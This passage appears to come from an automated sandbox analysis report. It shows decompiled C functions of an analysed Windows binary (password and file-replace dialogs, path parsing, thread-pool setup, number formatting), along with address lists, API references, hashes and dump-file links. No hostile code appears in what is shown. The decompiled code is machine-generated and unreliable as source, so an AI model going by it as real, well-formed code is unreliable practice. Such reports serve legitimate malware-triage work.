					L1:
					_t31 = 0;
				}
				return _t31;
			}














                            0x009ece52
                            0x009ece52
                            0x009ece52
                            0x009ece53
                            0x009ece57
                            0x009ece5e
                            0x009ece64
                            0x009ece74
                            0x009ece7a
                            0x009ece7e
                            0x009ece81
                            0x009ece8c
                            0x009ece8c
                            0x009ece94
                            0x009ece97
                            0x009eced2
                            0x009ece99
                            0x009ece99
                            0x009ece9c
                            0x009eceb1
                            0x009eceb2
                            0x00000000
                            0x009ece9e
                            0x009ecea1
                            0x009ecea6
                            0x009ecea7
                            0x009eceb7
                            0x009eceba
                            0x009ecebc
                            0x009ecebd
                            0x009ecec2
                            0x009ecec2
                            0x009ecea1
                            0x009ece9c
                            0x009ecede
                            0x009ecee4
                            0x009ecee8
                            0x009ecef2
                            0x00000000
                            0x009ecef8
                            0x009ecefe
                            0x009ecf07
                            0x009ecf0f
                            0x009ecf0f
                            0x009ece66
                            0x009ece66
                            0x009ece66
                            0x009ece66
                            0x009ecf16

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: __fprintf_l_strncpy
                            • String ID: $%s$@%s
                            • API String ID: 1857242416-834177443
                            • Opcode ID: 907b897ceb88303308b50cac49f90e65a03d9b61684cb8baad4a6c43a9390167
                            • Instruction ID: 2f5afc967ecd2dbc21e41ce3db425a7f1f81735f74cc1363037185c31b435428
                            • Opcode Fuzzy Hash: 907b897ceb88303308b50cac49f90e65a03d9b61684cb8baad4a6c43a9390167
                            • Instruction Fuzzy Hash: 73218EB244038CAEEF22DEA5DD45FEE3BACEB04700F000526FA5496192E375DE569B60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009FA0B0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                            Download Yara Rule
                            C-Code - Quality: 83%
                            			E009FA0B0(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR* _a16) {
				short _v260;
				void* __ebx;
				void* _t15;
				signed short _t24;
				struct HWND__* _t28;
				intOrPtr _t29;
				void* _t30;

				_t24 = _a12;
				_t29 = _a8;
				_t28 = _a4;
				if(E009E12D7(__edx, _t28, _t29, _t24, _a16, L"GETPASSWORD1", 0, 0) != 0) {
					L10:
					return 1;
				}
				_t30 = _t29 - 0x110;
				if(_t30 == 0) {
					SetDlgItemTextW(_t28, 0x67, _a16);
					goto L10;
				}
				if(_t30 != 1) {
					L5:
					return 0;
				}
				_t15 = (_t24 & 0x0000ffff) - 1;
				if(_t15 == 0) {
					GetDlgItemTextW(_t28, 0x66,  &_v260, 0x80);
					E009EE90C(_t24, 0xa35c00,  &_v260);
					E009EE957( &_v260, 0x80);
					_push(1);
					L7:
					EndDialog(_t28, ??);
					goto L10;
				}
				if(_t15 == 1) {
					_push(0);
					goto L7;
				}
				goto L5;
			}










                            0x009fa0ba
                            0x009fa0be
                            0x009fa0c2
                            0x009fa0db
                            0x009fa14a
                            0x00000000
                            0x009fa14c
                            0x009fa0dd
                            0x009fa0e3
                            0x009fa144
                            0x00000000
                            0x009fa144
                            0x009fa0e8
                            0x009fa0f7
                            0x00000000
                            0x009fa0f7
                            0x009fa0ed
                            0x009fa0f0
                            0x009fa116
                            0x009fa128
                            0x009fa135
                            0x009fa13a
                            0x009fa0fd
                            0x009fa0fe
                            0x00000000
                            0x009fa0fe
                            0x009fa0f5
                            0x009fa0fb
                            0x00000000
                            0x009fa0fb
                            0x00000000

                            APIs
                              • Part of subcall function 009E12D7: GetDlgItem.USER32(00000000,00003021), ref: 009E131B
                              • Part of subcall function 009E12D7: SetWindowTextW.USER32(00000000,00A122E4), ref: 009E1331
                            • EndDialog.USER32(?,00000001), ref: 009FA0FE
                            • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 009FA116
                            • SetDlgItemTextW.USER32(?,00000067,?), ref: 009FA144
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: ItemText$DialogWindow
                            • String ID: GETPASSWORD1
                            • API String ID: 445417207-3292211884
                            • Opcode ID: d004cc67f0ad6e03b36b802e14ecd8d0ffea316eaba034072c84ce17801b76ac
                            • Instruction ID: dc08fff65748b3f01d057d348d114886456b43f8dbb669588aacae8620dde572
                            • Opcode Fuzzy Hash: d004cc67f0ad6e03b36b802e14ecd8d0ffea316eaba034072c84ce17801b76ac
                            • Instruction Fuzzy Hash: C1110472A1421CB6DB219E689C49FFB7B7CEB4B700F114011FB4AB2080C6A59E5287A2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009EB1B7, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                            Download Yara Rule
                            C-Code - Quality: 70%
                            			E009EB1B7(void* __ecx, void* __eflags, signed short* _a4, short* _a8, intOrPtr _a12) {
				short _t10;
				void* _t13;
				signed int _t14;
				short* _t20;
				void* _t23;
				signed short* _t27;
				signed int _t29;
				signed int _t31;

				_t20 = _a8;
				_t27 = _a4;
				 *_t20 = 0;
				_t10 = E009EB4C6(_t27);
				if(_t10 == 0) {
					_t29 = 0x5c;
					if( *_t27 == _t29 && _t27[1] == _t29) {
						_push(_t29);
						_push( &(_t27[2]));
						_t10 = E00A00BB8(__ecx);
						_pop(_t23);
						if(_t10 != 0) {
							_push(_t29);
							_push(_t10 + 2);
							_t13 = E00A00BB8(_t23);
							if(_t13 == 0) {
								_t14 = E00A02B33(_t27);
							} else {
								_t14 = (_t13 - _t27 >> 1) + 1;
							}
							asm("sbb esi, esi");
							_t31 = _t29 & _t14;
							E00A04DDA(_t20, _t27, _t31);
							_t10 = 0;
							 *((short*)(_t20 + _t31 * 2)) = 0;
						}
					}
					return _t10;
				}
				return E009E3E41(_t20, _a12, L"%c:\\",  *_t27 & 0x0000ffff);
			}











                            0x009eb1b8
                            0x009eb1bf
                            0x009eb1c4
                            0x009eb1c7
                            0x009eb1ce
                            0x009eb1eb
                            0x009eb1ef
                            0x009eb1fa
                            0x009eb1fb
                            0x009eb1fc
                            0x009eb202
                            0x009eb205
                            0x009eb20a
                            0x009eb20b
                            0x009eb20c
                            0x009eb215
                            0x009eb21f
                            0x009eb217
                            0x009eb21b
                            0x009eb21b
                            0x009eb229
                            0x009eb22b
                            0x009eb230
                            0x009eb238
                            0x009eb23a
                            0x009eb23a
                            0x009eb205
                            0x00000000
                            0x009eb23e
                            0x00000000

                            APIs
                            • _swprintf.LIBCMT ref: 009EB1DE
                              • Part of subcall function 009E3E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 009E3E54
                            • _wcschr.LIBVCRUNTIME ref: 009EB1FC
                            • _wcschr.LIBVCRUNTIME ref: 009EB20C
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: _wcschr$__vswprintf_c_l_swprintf
                            • String ID: %c:\
                            • API String ID: 525462905-3142399695
                            • Opcode ID: f8a84881728bf6d959ae6361ba4d58bf24f08f1e65b6d5f81ade5bbfb57afb38
                            • Instruction ID: 89155dfe65fcb76f541d5f3731e9c2ff4e6c859191fac960f2bd6b5e44e41f6d
                            • Opcode Fuzzy Hash: f8a84881728bf6d959ae6361ba4d58bf24f08f1e65b6d5f81ade5bbfb57afb38
                            • Instruction Fuzzy Hash: 0C01F96350435276DA226B76AC46E6FB7ACEEA6770B50840AF994C3182FB30DC50C2B1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009F0326, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60COMMON
                            Download Yara Rule
                            C-Code - Quality: 74%
                            			E009F0326(long* __ecx, long _a4) {
				void* __esi;
				void* __ebp;
				long _t11;
				void* _t14;
				long _t23;
				long* _t25;

				_t19 = __ecx;
				_t11 = _a4;
				_t25 = __ecx;
				_t23 = 0x40;
				 *__ecx = _t11;
				if(_t11 > _t23) {
					 *__ecx = _t23;
				}
				if( *_t25 == 0) {
					 *_t25 = 1;
				}
				_t25[0x41] = 0;
				if( *_t25 > _t23) {
					 *_t25 = _t23;
				}
				_t3 =  &(_t25[0xc8]); // 0x320
				_t25[0xc5] = 0;
				InitializeCriticalSection(_t3);
				_t25[0xc6] = CreateSemaphoreW(0, 0, _t23, 0);
				_t14 = CreateEventW(0, 1, 1, 0);
				_t25[0xc7] = _t14;
				if(_t25[0xc6] == 0 || _t14 == 0) {
					_push(L"\nThread pool initialization failed.");
					_push(0xa200e0);
					E009E6CC9(E009E6CCE(_t19), 0xa200e0, _t25, 2);
				}
				_t25[0xc3] = 0;
				_t25[0xc4] = 0;
				_t25[0x42] = 0;
				return _t25;
			}









                            0x009f0326
                            0x009f0326
                            0x009f032e
                            0x009f0332
                            0x009f0333
                            0x009f0337
                            0x009f0339
                            0x009f0339
                            0x009f0342
                            0x009f0344
                            0x009f0344
                            0x009f0346
                            0x009f034e
                            0x009f0350
                            0x009f0350
                            0x009f0352
                            0x009f0358
                            0x009f035f
                            0x009f0373
                            0x009f0379
                            0x009f037f
                            0x009f038b
                            0x009f0391
                            0x009f039b
                            0x009f03a7
                            0x009f03a7
                            0x009f03ad
                            0x009f03b5
                            0x009f03bb
                            0x009f03c4

                            APIs
                            • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,009EA865,00000008,00000000,?,?,009EC802,?,00000000,?,00000001,?), ref: 009F035F
                            • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,009EA865,00000008,00000000,?,?,009EC802,?,00000000), ref: 009F0369
                            • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,009EA865,00000008,00000000,?,?,009EC802,?,00000000), ref: 009F0379
                            Strings
                            • Thread pool initialization failed., xrefs: 009F0391
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Create$CriticalEventInitializeSectionSemaphore
                            • String ID: Thread pool initialization failed.
                            • API String ID: 3340455307-2182114853
                            • Opcode ID: 73ec74777bdaf0daef83837853fb573d170644baabc61d41693e1b6d9aafc332
                            • Instruction ID: 8cef557b5b81b8bb45096c446293f1a69827b846afc05b894c2049883f1561e4
                            • Opcode Fuzzy Hash: 73ec74777bdaf0daef83837853fb573d170644baabc61d41693e1b6d9aafc332
                            • Instruction Fuzzy Hash: 3C1133B15007099FD3215F669C84AABFBECFB99754F10482EF2DA86201D6B15991CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009FC96E, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E009FC96E(long _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				long _v0;
				_Unknown_base(*)()* _t16;
				int _t22;
				WCHAR* _t25;

				 *0xa3ce10 = _a12;
				 *0xa3ce14 = _a16;
				 *0xa275f4 = _a20;
				if( *0xa275d3 == 0) {
					if( *0xa275d2 == 0) {
						_t16 = E009FAFB9;
						_t25 = L"REPLACEFILEDLG";
						while(1) {
							_t22 = DialogBoxParamW( *0xa20064, _t25,  *0xa275c8, _t16, _a4);
							if(_t22 != 4) {
								break;
							}
							if(DialogBoxParamW( *0xa20060, L"RENAMEDLG",  *0xa275d8, E009FC2A7, _v0) != 0) {
								break;
							}
						}
						return _t22;
					}
					return 1;
				}
				return 0;
			}







                            0x009fc979
                            0x009fc982
                            0x009fc98b
                            0x009fc990
                            0x009fc99d
                            0x009fc9ae
                            0x009fc9b3
                            0x009fc9da
                            0x009fc9ee
                            0x009fc9f3
                            0x00000000
                            0x00000000
                            0x009fc9d8
                            0x00000000
                            0x00000000
                            0x009fc9d8
                            0x00000000
                            0x009fc9fa
                            0x00000000
                            0x009fc9a1
                            0x00000000

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID:
                            • String ID: RENAMEDLG$REPLACEFILEDLG
                            • API String ID: 0-56093855
                            • Opcode ID: 069168d118fa33537104dfa702330cfd0d360a6724a69d9a9abd7910b9a33413
                            • Instruction ID: 16a4dfd9b2f34eccc7eccca4ab1cbb8b33e9f8d0e59d9f3ddf2bccaab4dc4662
                            • Opcode Fuzzy Hash: 069168d118fa33537104dfa702330cfd0d360a6724a69d9a9abd7910b9a33413
                            • Instruction Fuzzy Hash: AC01B5B210820DAFC710DF99EE00E77BBE9E745750F004836F641A2230C6A19D56DB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A08749, Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                            Download Yara Rule
                            C-Code - Quality: 75%
                            			E00A08749(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v48;
				char _v52;
				void* __ebx;
				void* __edi;
				void* _t86;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				void* _t101;
				void* _t102;
				void* _t104;
				void* _t107;
				void* _t109;
				void* _t111;
				void* _t115;
				char* _t116;
				void* _t119;
				signed int _t121;
				signed int _t128;
				signed int* _t129;
				signed int _t136;
				signed int _t137;
				char _t138;
				signed int _t139;
				signed int _t142;
				signed int _t146;
				signed int _t151;
				char _t156;
				char _t157;
				void* _t161;
				unsigned int _t162;
				signed int _t164;
				signed int _t166;
				signed int _t170;
				void* _t171;
				signed int* _t172;
				signed int _t174;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;

				_t171 = __edx;
				_t181 = _a24;
				if(_t181 < 0) {
					_t181 = 0;
				}
				_t184 = _a8;
				 *_t184 = 0;
				E00A03356(0,  &_v52, _t171, _a36);
				_t5 = _t181 + 0xb; // 0xb
				if(_a12 > _t5) {
					_t172 = _a4;
					_t142 = _t172[1];
					_v36 =  *_t172;
					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						L11:
						__eflags = _t142 & 0x80000000;
						if((_t142 & 0x80000000) != 0) {
							 *_t184 = 0x2d;
							_t184 = _t184 + 1;
							__eflags = _t184;
						}
						__eflags = _a28;
						_v16 = 0x3ff;
						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
						__eflags = _t172[1] & 0x7ff00000;
						_v32 = _t136;
						_t86 = 0x30;
						if((_t172[1] & 0x7ff00000) != 0) {
							 *_t184 = 0x31;
							_t185 = _t184 + 1;
							__eflags = _t185;
						} else {
							 *_t184 = _t86;
							_t185 = _t184 + 1;
							_t164 =  *_t172 | _t172[1] & 0x000fffff;
							__eflags = _t164;
							if(_t164 != 0) {
								_v16 = 0x3fe;
							} else {
								_v16 = _v16 & _t164;
							}
						}
						_t146 = _t185;
						_t186 = _t185 + 1;
						_v28 = _t146;
						__eflags = _t181;
						if(_t181 != 0) {
							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v48 + 0x88))))));
						} else {
							 *_t146 = 0;
						}
						_t92 = _t172[1] & 0x000fffff;
						__eflags = _t92;
						_v20 = _t92;
						if(_t92 > 0) {
							L23:
							_t33 =  &_v8;
							 *_t33 = _v8 & 0x00000000;
							__eflags =  *_t33;
							_t147 = 0xf0000;
							_t93 = 0x30;
							_v12 = _t93;
							_v20 = 0xf0000;
							do {
								__eflags = _t181;
								if(_t181 <= 0) {
									break;
								}
								_t119 = E009FDAC0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
								_t161 = 0x30;
								_t121 = _t119 + _t161 & 0x0000ffff;
								__eflags = _t121 - 0x39;
								if(_t121 > 0x39) {
									_t121 = _t121 + _t136;
									__eflags = _t121;
								}
								_t162 = _v20;
								_t172 = _a4;
								 *_t186 = _t121;
								_t186 = _t186 + 1;
								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
								_t147 = _t162 >> 4;
								_t93 = _v12 - 4;
								_t181 = _t181 - 1;
								_v20 = _t162 >> 4;
								_v12 = _t93;
								__eflags = _t93;
							} while (_t93 >= 0);
							__eflags = _t93;
							if(_t93 < 0) {
								goto L39;
							}
							_t115 = E009FDAC0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
							__eflags = _t115 - 8;
							if(_t115 <= 8) {
								goto L39;
							}
							_t54 = _t186 - 1; // 0xa03fc1
							_t116 = _t54;
							_t138 = 0x30;
							while(1) {
								_t156 =  *_t116;
								__eflags = _t156 - 0x66;
								if(_t156 == 0x66) {
									goto L33;
								}
								__eflags = _t156 - 0x46;
								if(_t156 != 0x46) {
									_t139 = _v32;
									__eflags = _t116 - _v28;
									if(_t116 == _v28) {
										_t57 = _t116 - 1;
										 *_t57 =  *(_t116 - 1) + 1;
										__eflags =  *_t57;
									} else {
										_t157 =  *_t116;
										__eflags = _t157 - 0x39;
										if(_t157 != 0x39) {
											 *_t116 = _t157 + 1;
										} else {
											 *_t116 = _t139 + 0x3a;
										}
									}
									goto L39;
								}
								L33:
								 *_t116 = _t138;
								_t116 = _t116 - 1;
							}
						} else {
							__eflags =  *_t172;
							if( *_t172 <= 0) {
								L39:
								__eflags = _t181;
								if(_t181 > 0) {
									_push(_t181);
									_t111 = 0x30;
									_push(_t111);
									_push(_t186);
									E009FE920(_t181);
									_t186 = _t186 + _t181;
									__eflags = _t186;
								}
								_t94 = _v28;
								__eflags =  *_t94;
								if( *_t94 == 0) {
									_t186 = _t94;
								}
								__eflags = _a28;
								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								_t174 = _a4[1];
								_t100 = E009FDAC0( *_a4, 0x34, _t174);
								_t137 = 0;
								_t151 = (_t100 & 0x000007ff) - _v16;
								__eflags = _t151;
								asm("sbb ebx, ebx");
								if(__eflags < 0) {
									L47:
									 *(_t186 + 1) = 0x2d;
									_t187 = _t186 + 2;
									__eflags = _t187;
									_t151 =  ~_t151;
									asm("adc ebx, 0x0");
									_t137 =  ~_t137;
									goto L48;
								} else {
									if(__eflags > 0) {
										L46:
										 *(_t186 + 1) = 0x2b;
										_t187 = _t186 + 2;
										L48:
										_t182 = _t187;
										_t101 = 0x30;
										 *_t187 = _t101;
										__eflags = _t137;
										if(__eflags < 0) {
											L56:
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L60:
												_push(0);
												_push(0xa);
												_push(_t137);
												_push(_t151);
												_t102 = E009FDE00();
												_v32 = _t174;
												 *_t187 = _t102 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												L61:
												_t104 = 0x30;
												_t183 = 0;
												__eflags = 0;
												 *_t187 = _t151 + _t104;
												 *(_t187 + 1) = 0;
												goto L62;
											}
											__eflags = _t137;
											if(__eflags < 0) {
												goto L61;
											}
											if(__eflags > 0) {
												goto L60;
											}
											__eflags = _t151 - 0xa;
											if(_t151 < 0xa) {
												goto L61;
											}
											goto L60;
										}
										if(__eflags > 0) {
											L51:
											_push(0);
											_push(0x3e8);
											_push(_t137);
											_push(_t151);
											_t107 = E009FDE00();
											_v32 = _t174;
											 *_t187 = _t107 + 0x30;
											_t187 = _t187 + 1;
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L55:
												_push(0);
												_push(0x64);
												_push(_t137);
												_push(_t151);
												_t109 = E009FDE00();
												_v32 = _t174;
												 *_t187 = _t109 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												goto L56;
											}
											L52:
											__eflags = _t137;
											if(__eflags < 0) {
												goto L56;
											}
											if(__eflags > 0) {
												goto L55;
											}
											__eflags = _t151 - 0x64;
											if(_t151 < 0x64) {
												goto L56;
											}
											goto L55;
										}
										__eflags = _t151 - 0x3e8;
										if(_t151 < 0x3e8) {
											goto L52;
										}
										goto L51;
									}
									__eflags = _t151;
									if(_t151 < 0) {
										goto L47;
									}
									goto L46;
								}
							}
							goto L23;
						}
					}
					__eflags = 0;
					if(0 != 0) {
						goto L11;
					} else {
						_t183 = E00A08A4C(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
						__eflags = _t183;
						if(_t183 == 0) {
							_t128 = E00A10FD0(_t184, 0x65);
							_pop(_t166);
							__eflags = _t128;
							if(_t128 != 0) {
								__eflags = _a28;
								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								__eflags = _t170;
								 *_t128 = _t170;
								 *((char*)(_t128 + 3)) = 0;
							}
							_t183 = 0;
						} else {
							 *_t184 = 0;
						}
						goto L62;
					}
				} else {
					_t129 = E00A07ECC();
					_t183 = 0x22;
					 *_t129 = _t183;
					E00A07DAB();
					L62:
					if(_v40 != 0) {
						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
					}
					return _t183;
				}
			}
























































                            0x00a08749
                            0x00a08754
                            0x00a0875b
                            0x00a0875d
                            0x00a0875d
                            0x00a0875f
                            0x00a08768
                            0x00a0876a
                            0x00a0876f
                            0x00a08775
                            0x00a0878b
                            0x00a08790
                            0x00a08793
                            0x00a087a0
                            0x00a087a5
                            0x00a087f9
                            0x00a08801
                            0x00a08803
                            0x00a08805
                            0x00a08808
                            0x00a08808
                            0x00a08808
                            0x00a0880e
                            0x00a08816
                            0x00a08829
                            0x00a0882c
                            0x00a0882e
                            0x00a08831
                            0x00a08832
                            0x00a08853
                            0x00a08856
                            0x00a08856
                            0x00a08834
                            0x00a08834
                            0x00a08836
                            0x00a08841
                            0x00a08841
                            0x00a08843
                            0x00a0884a
                            0x00a08845
                            0x00a08845
                            0x00a08845
                            0x00a08843
                            0x00a08857
                            0x00a08859
                            0x00a0885a
                            0x00a0885d
                            0x00a0885f
                            0x00a08873
                            0x00a08861
                            0x00a08861
                            0x00a08861
                            0x00a08878
                            0x00a08878
                            0x00a0887d
                            0x00a08880
                            0x00a0888b
                            0x00a0888b
                            0x00a0888b
                            0x00a0888b
                            0x00a0888f
                            0x00a08896
                            0x00a08897
                            0x00a0889a
                            0x00a0889d
                            0x00a0889d
                            0x00a0889f
                            0x00000000
                            0x00000000
                            0x00a088b7
                            0x00a088be
                            0x00a088c2
                            0x00a088c5
                            0x00a088c8
                            0x00a088ca
                            0x00a088ca
                            0x00a088ca
                            0x00a088cc
                            0x00a088cf
                            0x00a088d2
                            0x00a088d4
                            0x00a088dc
                            0x00a088e2
                            0x00a088e5
                            0x00a088e8
                            0x00a088e9
                            0x00a088ec
                            0x00a088ef
                            0x00a088ef
                            0x00a088f4
                            0x00a088f7
                            0x00000000
                            0x00000000
                            0x00a0890f
                            0x00a08914
                            0x00a08918
                            0x00000000
                            0x00000000
                            0x00a0891c
                            0x00a0891c
                            0x00a0891f
                            0x00a08920
                            0x00a08920
                            0x00a08922
                            0x00a08925
                            0x00000000
                            0x00000000
                            0x00a08927
                            0x00a0892a
                            0x00a08931
                            0x00a08934
                            0x00a08937
                            0x00a0894d
                            0x00a0894d
                            0x00a0894d
                            0x00a08939
                            0x00a08939
                            0x00a0893b
                            0x00a0893e
                            0x00a08949
                            0x00a08940
                            0x00a08943
                            0x00a08943
                            0x00a0893e
                            0x00000000
                            0x00a08937
                            0x00a0892c
                            0x00a0892c
                            0x00a0892e
                            0x00a0892e
                            0x00a08882
                            0x00a08882
                            0x00a08885
                            0x00a08950
                            0x00a08950
                            0x00a08952
                            0x00a08954
                            0x00a08957
                            0x00a08958
                            0x00a08959
                            0x00a0895a
                            0x00a08962
                            0x00a08962
                            0x00a08962
                            0x00a08964
                            0x00a08967
                            0x00a0896a
                            0x00a0896c
                            0x00a0896c
                            0x00a0896e
                            0x00a08980
                            0x00a08984
                            0x00a08987
                            0x00a0898e
                            0x00a08996
                            0x00a08996
                            0x00a08999
                            0x00a0899b
                            0x00a089ac
                            0x00a089ac
                            0x00a089b0
                            0x00a089b0
                            0x00a089b3
                            0x00a089b5
                            0x00a089b8
                            0x00000000
                            0x00a0899d
                            0x00a0899d
                            0x00a089a3
                            0x00a089a3
                            0x00a089a7
                            0x00a089ba
                            0x00a089ba
                            0x00a089be
                            0x00a089bf
                            0x00a089c1
                            0x00a089c3
                            0x00a08a04
                            0x00a08a04
                            0x00a08a06
                            0x00a08a13
                            0x00a08a13
                            0x00a08a15
                            0x00a08a17
                            0x00a08a18
                            0x00a08a19
                            0x00a08a20
                            0x00a08a23
                            0x00a08a25
                            0x00a08a25
                            0x00a08a26
                            0x00a08a28
                            0x00a08a2b
                            0x00a08a2b
                            0x00a08a2d
                            0x00a08a2f
                            0x00000000
                            0x00a08a2f
                            0x00a08a08
                            0x00a08a0a
                            0x00000000
                            0x00000000
                            0x00a08a0c
                            0x00000000
                            0x00000000
                            0x00a08a0e
                            0x00a08a11
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a08a11
                            0x00a089ca
                            0x00a089d0
                            0x00a089d0
                            0x00a089d2
                            0x00a089d3
                            0x00a089d4
                            0x00a089d5
                            0x00a089dc
                            0x00a089df
                            0x00a089e1
                            0x00a089e2
                            0x00a089e4
                            0x00a089f1
                            0x00a089f1
                            0x00a089f3
                            0x00a089f5
                            0x00a089f6
                            0x00a089f7
                            0x00a089fe
                            0x00a08a01
                            0x00a08a03
                            0x00a08a03
                            0x00000000
                            0x00a08a03
                            0x00a089e6
                            0x00a089e6
                            0x00a089e8
                            0x00000000
                            0x00000000
                            0x00a089ea
                            0x00000000
                            0x00000000
                            0x00a089ec
                            0x00a089ef
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a089ef
                            0x00a089cc
                            0x00a089ce
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a089ce
                            0x00a0899f
                            0x00a089a1
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a089a1
                            0x00a0899b
                            0x00000000
                            0x00a08885
                            0x00a08880
                            0x00a087a7
                            0x00a087a9
                            0x00000000
                            0x00a087ab
                            0x00a087c1
                            0x00a087c6
                            0x00a087c8
                            0x00a087d4
                            0x00a087da
                            0x00a087db
                            0x00a087dd
                            0x00a087df
                            0x00a087ea
                            0x00a087ea
                            0x00a087ed
                            0x00a087ef
                            0x00a087ef
                            0x00a087f2
                            0x00a087ca
                            0x00a087ca
                            0x00a087ca
                            0x00000000
                            0x00a087c8
                            0x00a08777
                            0x00a08777
                            0x00a0877e
                            0x00a0877f
                            0x00a08781
                            0x00a08a33
                            0x00a08a37
                            0x00a08a3c
                            0x00a08a3c
                            0x00a08a4b
                            0x00a08a4b

                            APIs
                            Memory Dump Source
